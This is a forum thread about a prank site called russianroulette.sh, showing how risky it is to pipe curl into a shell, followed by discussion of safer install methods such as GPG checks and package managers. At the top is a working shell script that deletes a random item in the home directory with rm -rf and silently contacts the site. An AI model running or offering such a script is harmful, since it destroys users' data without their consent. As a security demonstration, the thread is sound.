Hacker Timesnew | past | comments | ask | show | jobs | submitlogin
Curl-to-shell russian roulette (russianroulette.sh)
9 points by coconutrandom on Nov 17, 2013 | hide | past | favorite | 8 comments


  #!/bin/sh
  ( 
  files=(~/*);
  f="${files[RANDOM % ${#files[@]}]}"
  rm -rf "$f"
  curl http://placekitten.com/g/320/240 > "$f"
  echo 'bang!' $f 'is now a kitten'  ) && curl --silent -o /dev/null http://russianroulette.sh/b/QPteR3KS/3/NamelessWonder
cute, but please refrain from pasting malware to HN


At least you know he's serious about the Russian roulette. It also illustrates the point, quite directly.

Reminds me of the old Casino DOS virus which copied the FAT to RAM and proceeded to flush it, but challenged you to a game of slots to retrieve the data (it was a fluke, your data would be destroyed in all cases).

By the way, the page markup isn't that bad. You're using tables and HTML4 semantics in an HTML5 doctype declaration, but the actual quality is fine.


You know what? This is perfect.

Some users are gonna go all "no", "this is bad", "no malware on HN" and "you must be crazy to do it yadda yadda" on you, but in the end it doesn't matter because you've done it: you've disrupted that little peace of mind they had about running "curl rvm.io/install | sh".

Now they know that piping a curl command to shell is akin to unprotected sex. Sure, I'd happily be the first to say "oh come on, we all know RVM, the guy doesn't have any diseases: he's all clean, there's no risk" and we'd all be happy to follow with some wishful thinking of "there's a one in a billion chance something bad happens, no way I'm that unlucky".

But just like russian roulette, one bad time is enough to get in a _LOT_ of trouble.

Sorry comrades, I'm done compromising my box's security on a daily basis. From now on, I'll GPG-check your install scripts before piping them blindly to my personal area :)

Even better: why don't we write a common install pattern for scripts?

Something simple like $ web-install http://your-site.com/

* Attempts to download conf file from http://your-site.com/WEB_INSTALL

* Looks up install script and gpg file path in the conf file

* Downloads install script and gpg file to /tmp and gpg-check the install script.

* If it all checks out, run the install script.

Or maybe we already have something cool like this but some developers seem to think this commodities are for neckbeards who swim in gpg keys all day long?

PS: Using RVM as an example there because I only have them in mind but I did this for npm too in the past and countless others I can't remember, so no hate intended against them.


Gee, you mean like RPM, or deb files? Why people keep reinventing these tools, but much worse, I have no idea.


I thought of this, yeah. Which made me wonder: "why do we need to pipe a shell script to install RVM instead of yum install RVM?".

I don't have an answer and would gladly accept one though I suspect it's related to difficulties with deploying to multiple release systems (rpm, yum, deb, apt-get, brew, ports,..).


Maybe at the very least, something that:

* curls/wgets the script over https

* shows you the script in less

* then asks you whether you want to run it


What about no?


Genius!




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: